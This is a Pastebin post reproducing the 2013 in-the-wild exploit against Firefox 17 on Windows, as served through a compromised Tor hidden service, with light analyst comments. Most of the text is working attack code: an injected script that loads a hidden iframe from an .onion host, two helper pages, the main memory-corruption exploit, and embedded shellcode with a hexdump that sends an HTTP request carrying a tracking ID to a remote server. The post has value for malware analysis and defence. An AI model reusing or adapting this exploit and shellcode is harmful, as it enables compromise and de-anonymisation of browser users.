API tools faq
paste
Advertisement
Sky__Black

Exploit - Tor - Mozilla.org

Sky__Black
Aug 5th, 2013
735
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 57.20 KB | None | 0 0
raw download clone embed print report
  1. #################################
  2. # Exploit committed to Tor #
  3. # Mozilla.org #
  4. # Var : Magneto #
  5. #################################
  6.  
  7. #################################################################################################################
  8. ___________ .__ .__ __ ___________
  9. \_ _____/___ _________ | | ____ |__|_/ |_ \__ ___/ ____ _______
  10. | __)_ \ \/ /\____ \ | | / _ \ | |\ __\ ______ | | / _ \ \_ __ \
  11. | \ > < | |_> >| |__( <_> )| | | | /_____/ | | ( <_> ) | | \/
  12. /_______ //__/\_ \| __/ |____/ \____/ |__| |__| |____| \____/ |__|
  13. \/ \/|__|
  14. #################################################################################################################
  15.  
  16. /****************************************************************************
  17. * Exploits delivered from through nl7qbezu7pqsuone.onion (2013-08-03):
  18. *
  19. * The compromised server inserts a run-of-the-mill unobfuscated iframe
  20. * injection script; others have observed this and samples have been posted.
  21. *
  22. * The exploit is split across three files and presumably an ultimate
  23. * payload of malware that was not obtained.
  24. */
  25.  
  26. // To preserve the JavaScript syntax highlighting, non-JS bits are commented out.
  27.  
  28. /****************************************************************************
  29. * A somewhat cleaned up version is presented first, the original exploit
  30. * as first downloaded follows.
  31. *
  32. * This appears to be an exploit in the Firefox 17 JS runtime. The script
  33. * does not attempt the exploit unless running on Firefox 17 on Windows.
  34. */
  35.  
  36. /****************************************************************************
  37. * A compromised server inserts a script like the following.
  38. * The XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX is a UUID generated by the server.
  39. * The exploit host will serve the exploit for any UUID, however.
  40. * I used 05cea4de-951d-4037-bf8f-f69055b279bb for this analysis.
  41. * The UUID is embedded in the shellcode.
  42. */
  43.  
  44. //<script type='text/javascript'>
  45.  
  46. function createCookie(name,value,minutes) {
  47. if (minutes) {
  48. var date = new Date();
  49. date.setTime(date.getTime()+(minutes*60*1000));
  50. var expires = "; expires="+date.toGMTString();
  51. }
  52. else var expires = "";
  53. document.cookie = name+"="+value+expires+"; path=/";
  54. }
  55.  
  56. function readCookie(name) {
  57. var nameEQ = name + "=";
  58. var ca = document.cookie.split(';');
  59. for(var i=0;i < ca.length;i++) {
  60. var c = ca[i];
  61. while (c.charAt(0)==' ') c = c.substring(1,c.length);
  62. if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  63. }
  64. return null;
  65. }
  66.  
  67. function isFF() {
  68. return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  69. }
  70.  
  71. function updatify() {
  72. var iframe = document.createElement('iframe');
  73. iframe.style.display = "inline";
  74. iframe.frameBorder = "0";
  75. iframe.scrolling = "no";
  76. iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
  77. iframe.height = "5";
  78. iframe.width = "*";
  79. document.body.appendChild(iframe);
  80. }
  81.  
  82. function format_quick() {
  83. if ( ! readCookie("n_serv") ) {
  84. createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);
  85. updatify();
  86. }
  87. }
  88.  
  89. function isReady()
  90. {
  91. if ( document.readyState === "interactive" || document.readyState === "complete" ) {
  92.  
  93. if ( isFF() ) {
  94. format_quick();
  95. }
  96. }
  97. else
  98. {
  99. setTimeout(isReady, 250);
  100. }
  101. }
  102. setTimeout(isReady, 250);
  103. //</script>
  104.  
  105. /****************************************************************************
  106. * The exploit server at nl7qbezu7pqsuone.onion also delivers two supporting
  107. * pieces that are loaded into their own iframes. Since they are short,
  108. * they are included before the main exploit.
  109. *
  110. * (All lines containing HTML are commented out.)
  111. */
  112.  
  113. //// "content_2.html"
  114. // <html><body></body></html>
  115. // <script>
  116. var y="?????", url=window.location.href;
  117. if(0>url.indexOf(y)) {
  118. var iframe=document.createElement("iframe");
  119. iframe.src="content_3.html";
  120. document.body.appendChild(iframe)
  121. } else parent.w();
  122. function df(){return parent.df()};
  123. // </script>
  124.  
  125. //// "content_3.html"
  126. // <script>
  127. var y="?????",z="<body><img height='1' width='1' src='error.html' onerror=\"javascript: window.location.href='content_2.html?????';\" ></body>",flag=!1,var83=0;
  128.  
  129. function b() {
  130. for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)
  131. e[c]=new ArrayBuffer(180);
  132. for(c=0;1024>c;c++)
  133. d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;
  134. return d
  135. }
  136. function a() {
  137. !1==flag && (flag=!0,window.stop());
  138. window.stop();
  139. b();
  140. window.parent.frames[0].frameElement.ownerDocument.write(z);
  141. b()
  142. }
  143. var83 = parent.df();
  144. 0!=var83 && document.addEventListener("readystatechange",a,!1);
  145. // </script>
  146.  
  147. //// The main exploit
  148. // <html>
  149. // <body>
  150. // <iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
  151. // </body>
  152. // </html>
  153.  
  154. // <script>
  155.  
  156. var var1=0xB0;
  157. var var2 = new Array(var1);
  158. var var3 = new Array(var1);
  159. var var4 = new Array(var1);
  160.  
  161. var var5=0xFF004;
  162. var var6=0x3FC01;
  163.  
  164. var var7=0x60000000;
  165. var var8=0x18000000;
  166.  
  167.  
  168. var var9=1;
  169.  
  170. var var10 = 0x12000000;
  171. var var11 = 0;
  172. var var12=0; // set in b() if on Firefox 17, read in df()
  173. // exploit will not be attempted unless var12 is set
  174.  
  175. var var13 =0;
  176.  
  177. // top entry point, called as onload handler
  178. function u()
  179. {
  180. if( t() == true )
  181. {
  182. var9 = 1;
  183. b();
  184. d();
  185. c();
  186. }else{
  187. return ;
  188. }
  189. }
  190.  
  191. function t() // only attempt the exploit once per session
  192. {
  193. if(typeof sessionStorage.tempStor !="undefined")
  194. return false;
  195. sessionStorage.tempStor="";
  196. return true;
  197. }
  198.  
  199. function b()
  200. {
  201. var version = al(); // ensure Firefox on Windows
  202. if(version <17)
  203. {
  204. window.location.href="content_1.html";
  205. } // "content_1.html" was never obtained
  206. if( version >=17 && version <18 )
  207. var12 = 0xE8;
  208. return ;
  209. }
  210.  
  211. function aj(version) // confirm Windows platform
  212. {
  213. var i = navigator.userAgent.indexOf("Windows NT");
  214. if (i != -1)
  215. return true;
  216. return false;
  217. }
  218.  
  219. function ak() // confirm Firefox browser
  220. {
  221. var ua = navigator.userAgent;
  222. var browser = ua.substring(0, ua.lastIndexOf("/"));
  223. browser = browser.substring(browser.lastIndexOf(" ") + 1);
  224. if (browser != "Firefox")
  225. return -1;
  226.  
  227. var version = ua.substring(ua.lastIndexOf("/") + 1);
  228. version = parseInt(version.substring(0, version.lastIndexOf(".")));
  229. return version;
  230. }
  231.  
  232. function al() // get browser version, -1 if not exploitable
  233. {
  234. version = ak();
  235.  
  236. if (!aj(version))
  237. return -1;
  238. return version;
  239. }
  240.  
  241. function d()
  242. {
  243. for(var j=0;j<var1;j++)
  244. {
  245. if( j<var1/8 || j==var1-1)
  246. {
  247. var tabb = new Array(0x1ED00);
  248. var4[j]=tabb;
  249. for(i=0;i<0x1ED00;i++)
  250. {
  251. var4[j][i]=0x11559944;
  252. }
  253. }
  254. var2[j]= new ArrayBuffer(var5);
  255. }
  256. for(var j=0;j<var1;j++)
  257. {
  258. var3[j]= new Int32Array(var2[j],0,var6);
  259. var3[j][0]=0x11336688;
  260.  
  261. for(var i=1;i<16;i++)
  262. {
  263. var3[j][0x4000*i] = 0x11446688;
  264. }
  265.  
  266. }
  267.  
  268. for(var j=0;j<var1;j++)
  269. {
  270. if(typeof var4[j] !="undefined")
  271. {
  272. var4[j][0]=0x22556611;
  273. }
  274. }
  275. }
  276.  
  277. // load the next piece of the exploit
  278. function c()
  279. {
  280. var iframe=document.getElementById("iframe");
  281. iframe.src="content_2.html";
  282. }
  283.  
  284. // functions below here are called from the other iframes
  285.  
  286. // df() is passed through content_2 and used by content_3
  287. // called nowhere else
  288. // The exploit is not attempted if this returns zero.
  289. // Note that var12 will be zero unless on Firefox 17.
  290. // The returned value is used as part of a heap spray in content_3.
  291. function df()
  292. {
  293. if(var12==0)
  294. {
  295. return 0x00000000;
  296. }
  297. var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
  298.  
  299. if( var9 == 1 || var9 == 2)
  300. return ( var14 - var12);
  301. else
  302. return 0x00000000;
  303. }
  304.  
  305. // w() is called from the second time content_2 is loaded
  306. function w()
  307. {
  308. if(var9==1)
  309. v();
  310. else
  311. x();
  312. }
  313.  
  314. function v()
  315. {
  316. if(k() == -1)
  317. {
  318. var11 = p();
  319. var9 = 2;
  320. c();
  321. }else{
  322. x();
  323. }
  324. }
  325.  
  326. // This quickly becomes a huge mess that is obviously depending
  327. // on the JS runtime to screw up in some arcane way. Little is
  328. // known about the actual exploit, other than some apparent
  329. // shellcode in function f(). Here be dragons.
  330.  
  331. function k()
  332. {
  333. for(var j=0;j<var1;j++)
  334. {
  335. if(var2[j].byteLength!=var5)
  336. {
  337. return j;
  338. }
  339. }
  340. return -1;
  341. }
  342.  
  343. function p()
  344. {
  345. for(var j=0;j<var1;j++)
  346. {
  347. for(var i=1;i<16;i++)
  348. {
  349. if(var3[j][i*0x4000-0x02]==0x01000000)
  350. {
  351. return -i;
  352. }
  353. }
  354. }
  355. return 0;
  356. }
  357.  
  358. function x()
  359. {
  360.  
  361. var var60 = k();
  362. if(var60==-1)
  363. return ;
  364.  
  365. var nextvar60 = q(var60);
  366. if(nextvar60==-1)
  367. return ;
  368.  
  369. var var61 = o(var60);
  370. var var62 = new Int32Array(var2[nextvar60],0,var8);
  371. var var58 = n(var62,var61);
  372. if(var58==-1)
  373. return ;
  374.  
  375. var var50 = m(var62,var58);
  376.  
  377. var13 = var10 + 0x00100000 + 0x00010000 * var11;
  378. e(var62);
  379.  
  380. l(var62,var58);
  381.  
  382. var var64 = var4[var50][0];
  383.  
  384. ac(var64,var50,var62,var58,var60);
  385. }
  386.  
  387. function q(var60)
  388. {
  389. var view = new Int32Array(var2[var60],0,0x00040400);
  390. view[0x00100000/4-0x02]=var7;
  391. if(var2[var60+1].byteLength==var7)
  392. return var60+1;
  393. return -1;
  394. }
  395.  
  396. function o(var60)
  397. {
  398. var view = new Int32Array(var2[var60],0,0x00040400);
  399.  
  400. var var59 = view[0x00100000/4-0x0C];
  401. var var57 = var10 + 0x00100000 + 0x00010000 * var11;
  402.  
  403. return ((var59 - var57)/4);
  404. }
  405.  
  406. function n(view,firstvar58)
  407. {
  408. var var57 = var10 + 0x00100000 + 0x00010000 * var11;
  409. var var58=0;
  410. for(var i=0;i<200;i++)
  411. {
  412. if(view[var58] != 0x11336688)
  413. {
  414. if(view[var58] == 0x22556611 )
  415. return var58;
  416. else
  417. return -1;
  418. }
  419. if(var58==0)
  420. {
  421. var58 = firstvar58;
  422. }else{
  423. var var59=view[var58-0x0C];
  424. var58 = (var59 - var57)/4;
  425. }
  426. }
  427. return -1;
  428. }
  429.  
  430. function m(view,var58)
  431. {
  432. view[var58]=0x00000000;
  433. for(var j=0;j<var1;j++)
  434. {
  435. if(typeof var4[j] !="undefined")
  436. {
  437. if(var4[j][0]!=0x22556611)
  438. return j;
  439. }
  440. }
  441. return -1
  442. }
  443.  
  444. function e(view)
  445. {
  446. var i=0;
  447. for(i=0;i<0x400;i++)
  448. {
  449. view[i] = var13+0x1010 ;
  450. }
  451. view[0x0]=var13+0x1010;
  452. view[0x44]=0x0;
  453. view[0x45]=0x0;
  454. view[0x400-4]=var13+0x1010;
  455. view[0x400]=0x00004004;
  456. view[0x401]=0x7FFE0300;
  457. }
  458.  
  459. function l(view,var58)
  460. {
  461. view[var58] = var13 + 0x1030;
  462. view[var58+1] = 0xFFFFFF85;
  463. }
  464.  
  465. function ac(var64,var50,var62,var58,var60)
  466. {
  467. var var15=ah(var64);
  468.  
  469. f(var15,var62,var58);
  470.  
  471. y(var50);
  472. var var66 = aa(var62,var58+2);
  473.  
  474. var var67 = i(var66,0x40,var50,var62) ;
  475. j(var67,var62);
  476.  
  477. g(var50,var62);
  478. ab(var13+0x1040 ,var62,var58+2);
  479.  
  480. r(var60)
  481. setTimeout(ad,1000);
  482. z(var50);
  483. }
  484.  
  485. function ah(var73)
  486. {
  487. var var74 = var73.substring(0,2);
  488. var var70 = var74.charCodeAt(0);
  489. var var71 = var74.charCodeAt(1);
  490. var var75 = (var71 << 16) + var70;
  491. if (var75 == 0)
  492. {
  493. var var76 = var73.substring(32, 34);
  494. var var70 = var76.charCodeAt(0);
  495. var var71 = var76.charCodeAt(1);
  496. var75 = (var71 << 16) + var70;
  497. }
  498. var var15 = am(var75);
  499. if (var15 == -1)
  500. {
  501. return;
  502. }
  503. return var15
  504. }
  505.  
  506. function am(var77)
  507. {
  508. var var15 = new Array(2);
  509. if (var77 % 0x10000 == 0xE510)
  510. {
  511. var78 = var77 - 0xE510;
  512. var15[0] = var78 + 0xE8AE;
  513. var15[1] = var78 + 0xD6EE;
  514. }
  515. else if (var77 % 0x10000 == 0x9A90)
  516. {
  517. var78 = var77 - 0x69A90;
  518. var15[0] = var78 + 0x6A063;
  519. var15[1] = var78 + 0x68968;
  520. }
  521. else if (var77 % 0x10000 == 0x5E70)
  522. {
  523. var78 = var77 - 0x65E70;
  524. var15[0] = var78 + 0x66413;
  525. var15[1] = var78 + 0x64D34;
  526. }
  527. else if (var77 % 0x10000 == 0x35F3)
  528. {
  529. var78 = var77 - 0x335F3;
  530. var15[0] = var78 + 0x4DE13;
  531. var15[1] = var78 + 0x49AB8;
  532. }
  533. else if (var77 % 0x10000 == 0x5CA0)
  534. {
  535. var78 = var77 - 0x65CA0;
  536. var15[0] = var78 + 0x66253;
  537. var15[1] = var78 + 0x64B84;
  538. }
  539. else if (var77 % 0x10000 == 0x5CD0)
  540. {
  541. var78 = var77 - 0x65CD0;
  542. var15[0] = var78 + 0x662A3;
  543. var15[1] = var78 + 0x64BA4;
  544.  
  545. }
  546. else if (var77 % 0x10000 == 0x6190)
  547. {
  548. var78 = var77 - 0x46190;
  549. var15[0] = var78 + 0x467D3;
  550. var15[1] = var78 + 0x45000;
  551.  
  552. }
  553. else if (var77 % 0x10000 == 0x9CB9)
  554. {
  555. var78 = var77 - 0x29CB9;
  556. var15[0] = var78 + 0x29B83;
  557. var15[1] = var78 + 0xFFC8;
  558. }
  559. else if (var77 % 0x10000 == 0x9CE9)
  560. {
  561. var78 = var77 - 0x29CE9;
  562. var15[0] = var78 + 0x29BB3;
  563. var15[1] = var78 + 0xFFD8;
  564. }
  565. else if (var77 % 0x10000 == 0x70B0)
  566. {
  567. var78 = var77 - 0x470B0;
  568. var15[0] = var78 + 0x47733;
  569. var15[1] = var78 + 0x45F18;
  570. }
  571. else if (var77 % 0x10000 == 0x7090)
  572. {
  573. var78 = var77 - 0x47090;
  574. var15[0] = var78 + 0x476B3;
  575. var15[1] = var78 + 0x45F18;
  576. }
  577. else if (var77 % 0x10000 == 0x9E49)
  578. {
  579. var78 = var77 - 0x29E49;
  580. var15[0] = var78 + 0x29D13;
  581. var15[1] = var78 + 0x10028;
  582. }
  583. else if (var77 % 0x10000 == 0x9E69)
  584. {
  585. var78 = var77 - 0x29E69;
  586. var15[0] = var78 + 0x29D33;
  587. var15[1] = var78 + 0x10018;
  588. }
  589.  
  590. else if (var77 % 0x10000 == 0x9EB9)
  591. {
  592. var78 = var77 - 0x29EB9;
  593. var15[0] = var78 + 0x29D83;
  594. var15[1] = var78 + 0xFFC8;
  595. }
  596. else
  597. {
  598. return -1;
  599. }
  600.  
  601. return var15;
  602. }
  603.  
  604. function f(var15,view,var16)
  605. {
  606. var magneto = "";
  607. var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u302f\u6335"+"\u6165\u6434"+"\u2d65\u3539"+"\u6431\u342d"+"\u3330\u2d37"+"\u6662\u6638"+"\u662d\u3936"+"\u3530\u6235"+"\u3732\u6239"+"\u2062\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
  608. var var29 = magneto;
  609. var var17 = "\u9060";
  610. var var18 = "\u9061";
  611. var var19 = "\uC481\u0000\u0008" ;
  612. var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
  613. var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
  614. var var22 = "\uE589";
  615. var var23 ="\uC3C9";
  616. var var24 = "\uE889";
  617. var24 += "\u608D\u90C0";
  618.  
  619. var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
  620. var var26 = var25 + var16*4
  621.  
  622. var var27 =""
  623. var27 += "\uB890\u2020\u2020";
  624. var27 += "\uA390"+ae(var26+0x00);
  625. var27 += "\uA390"+ae(var26+0x04);
  626. var27 += "\uA390"+ae(var26+0x08);
  627. var27 += "\uA390"+ae(var26+0x0C);
  628.  
  629. var var28 = var17;
  630. var28 += var20;
  631. var28 += var19;
  632. var28 += var22;
  633. var28 += var27;
  634. var28 += var29;
  635. var28 += var21;
  636. var28 += var18;
  637. var28 += var23;
  638. var var29Array = new Array();
  639. var29Array=ag(var28);
  640.  
  641. var var29Ad = var13+0x5010;
  642. var i=0;
  643. var j=0;
  644. var var30=var13+0x4048;
  645. var var31 = new Array();
  646.  
  647. var31[0]=var30;
  648. var31[1]=var30;
  649. var31[2]=var30;
  650. var31[3]=var15[1];
  651. var31[4]=var29Ad;
  652. var31[5]=0xFFFFFFFF;
  653. var31[6]=var13+0x4044;
  654. var31[7]=var13+0x4040;
  655. var31[8]=0x00000040;
  656. var31[9]=var13+0x4048;
  657. var31[10]=0x00040000;
  658. var31[11]=var29Ad;
  659. var31[12]=var13+0x301C;
  660.  
  661. for(var i=0 ; i < 0x140 ; i++)
  662. {
  663. var31[i+15]=var15[0];
  664. }
  665. var var32 = 0x3F8;
  666. view[0x800+0+var32]=var13+0x4018;
  667. view[0x800+1+var32]=var13+0x4018;
  668. for(var i=2 ; i < var31.length ; i++)
  669. {
  670. view[0x800+i+var32]= 0x41414141;
  671. }
  672. for(var i=0 ; i < var31.length ; i++)
  673. {
  674. view[0xC02+i+var32]= var31[i];
  675. }
  676. for(var i=0 ; i < var29Array.length ; i++)
  677. {
  678. view[0x1000 + i+var32] = var29Array[i];
  679. }
  680.  
  681. }
  682.  
  683. function ae(int32)
  684. {
  685. var var68 = String.fromCharCode((int32)& 0x0000FFFF);
  686. var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
  687. return var68+var69;
  688. }
  689.  
  690. function af(string)
  691. {
  692. var var70 = string.charCodeAt(0);
  693. var var71 = string.charCodeAt(1);
  694. var var72 = (var71 << 16) + var70;
  695. return var72;
  696. }
  697.  
  698. function ag(string)
  699. {
  700. if(string.length%2!=0)
  701. string+="\u9090";
  702. var intArray= new Array();
  703. for(var i=0 ; i*2 < string.length; i++ )
  704. intArray[i]=af(string[i*2]+string[i*2+1]);
  705. return intArray;
  706. }
  707.  
  708. function y(index)
  709. {
  710. var4[index][1]= document.createElement('span') ;
  711. }
  712.  
  713. function aa(view,var63)
  714. {
  715. return view[var63];
  716. }
  717.  
  718. function i(address,size,var50,view)
  719. {
  720. var var56 = size/2;
  721. var56 = var56*0x10 +0x04;
  722. view[0x400]=var56;
  723. view[0x401]=address;
  724. return var4[var50][0];
  725. }
  726.  
  727. function j(memory,view)
  728. {
  729. var intArray=ag(memory);
  730. for(var i=0 ; i < intArray.length ; i++)
  731. {
  732. view[0x404+i]=intArray[i];
  733. }
  734. }
  735.  
  736. function g(var50,view)
  737. {
  738. var k = h(var50,view);
  739. var j=0;
  740. if( k < 0 )
  741. return -1;
  742. view[0x404+k]=var13+0x3010;
  743. return 1;
  744. }
  745.  
  746. function h(var50,view)
  747. {
  748. var address=0;
  749. var u=0;
  750. var memory="";
  751. var var55=0;
  752. for( u =7; u >=4 ;u--)
  753. {
  754. address=view[0x404+u];
  755. if( address > 0x000A0000 && address < 0x80000000 )
  756. {
  757. memory = i(address,0x48,var50,view);
  758. var55=af(memory[0x14]+memory[0x15]);
  759. if(var55==address)
  760. {
  761. return u;
  762. }
  763. }
  764. }
  765. return -1;
  766. }
  767.  
  768. function ab(address,view,var63)
  769. {
  770. view[var63]=address;
  771. }
  772.  
  773. function r(var60)
  774. {
  775. var view = new Int32Array(var2[var60],0,0x00040400);
  776. view[0x00100000/4-0x02]=var5;
  777. }
  778.  
  779. function z(index,index2)
  780. {
  781. var4[index][1].innerHTML;
  782. }
  783.  
  784. // ad() is called through setTimeout
  785. function ad()
  786. {
  787. for(var j=0;j<var1;j++)
  788. {
  789. delete var3[j]
  790. var3[j]= null;
  791.  
  792. delete var2[j];
  793. var2[j] = null;
  794.  
  795. if(typeof var4[j] !="undefined")
  796. {
  797. delete var4[j];
  798. var4[j] = null;
  799. }
  800. }
  801. delete var2;
  802. delete var3;
  803. delete var4;
  804. var2=null;
  805. var3=null;
  806. var4=null;
  807. }
  808.  
  809. window.addEventListener("onload", u(),true);
  810.  
  811. // </script>
  812.  
  813. /****************************************************************************
  814. * This a hexdump of the shellcode block as "var magneto" in f() above.
  815. */
  816. // 0000 60 fc e8 8a 00 00 00 60 89 e5 31 d2 64 8b 52 30 |`......`..1.d.R0|
  817. // 0010 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 |.R..R..r(..J&1.1|
  818. // 0020 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 |..<a|., .......R|
  819. // 0030 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a |W.R..B<...@x..tJ|
  820. // 0040 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 |..P.H..X ...<I.4|
  821. // 0050 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 |...1.1.......8.u|
  822. // 0060 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 |..}.;}$u.X.X$..f|
  823. // 0070 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 |..K.X.........D$|
  824. // 0080 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 |$[[aYZQ..X_Z....|
  825. // 0090 05 5d 81 bd e9 02 00 00 47 45 54 20 75 70 8d 85 |.]......GET up..|
  826. // 00a0 d1 02 00 00 50 68 4c 77 26 07 ff d5 85 c0 74 5e |....PhLw&.....t^|
  827. // 00b0 8d 85 d8 02 00 00 50 68 4c 77 26 07 ff d5 85 c0 |......PhLw&.....|
  828. // 00c0 74 4c bb 90 01 00 00 29 dc 54 53 68 29 80 6b 00 |tL.....).TSh).k.|
  829. // 00d0 ff d5 01 dc 85 c0 75 36 50 50 50 50 40 50 40 50 |......u6PPPP@P@P|
  830. // 00e0 68 ea 0f df e0 ff d5 31 db f7 d3 39 c3 74 1f 89 |h......1...9.t..|
  831. // 00f0 c3 6a 10 8d b5 e1 02 00 00 56 53 68 99 a5 74 61 |.j.......VSh..ta|
  832. // 0100 ff d5 85 c0 74 1f fe 8d 89 00 00 00 75 e3 80 bd |....t.......u...|
  833. // 0110 4f 02 00 00 01 74 07 e8 3b 01 00 00 eb 05 e8 4d |O....t..;......M|
  834. // 0120 01 00 00 ff e7 b8 00 01 00 00 29 c4 89 e2 52 50 |..........)...RP|
  835. // 0130 52 68 b6 49 de 01 ff d5 5f 81 c4 00 01 00 00 85 |Rh.I...._.......|
  836. // 0140 c0 0f 85 f2 00 00 00 57 e8 f9 00 00 00 5e 89 ca |.......W.....^..|
  837. // 0150 8d bd e9 02 00 00 e8 eb 00 00 00 4f 83 fa 20 7c |...........O.. ||
  838. // 0160 05 ba 20 00 00 00 89 d1 56 f3 a4 b9 0d 00 00 00 |.. .....V.......|
  839. // 0170 8d b5 c4 02 00 00 f3 a4 89 bd 4b 02 00 00 5e 56 |..........K...^V|
  840. // 0180 68 a9 28 34 80 ff d5 85 c0 0f 84 aa 00 00 00 66 |h.(4...........f|
  841. // 0190 8b 48 0a 66 83 f9 04 0f 82 9c 00 00 00 8d 40 0c |.H.f..........@.|
  842. // 01a0 8b 00 8b 08 8b 09 b8 00 01 00 00 50 89 e7 29 c4 |...........P..).|
  843. // 01b0 89 e6 57 56 51 51 68 48 72 d2 b8 ff d5 85 c0 81 |..WVQQhHr.......|
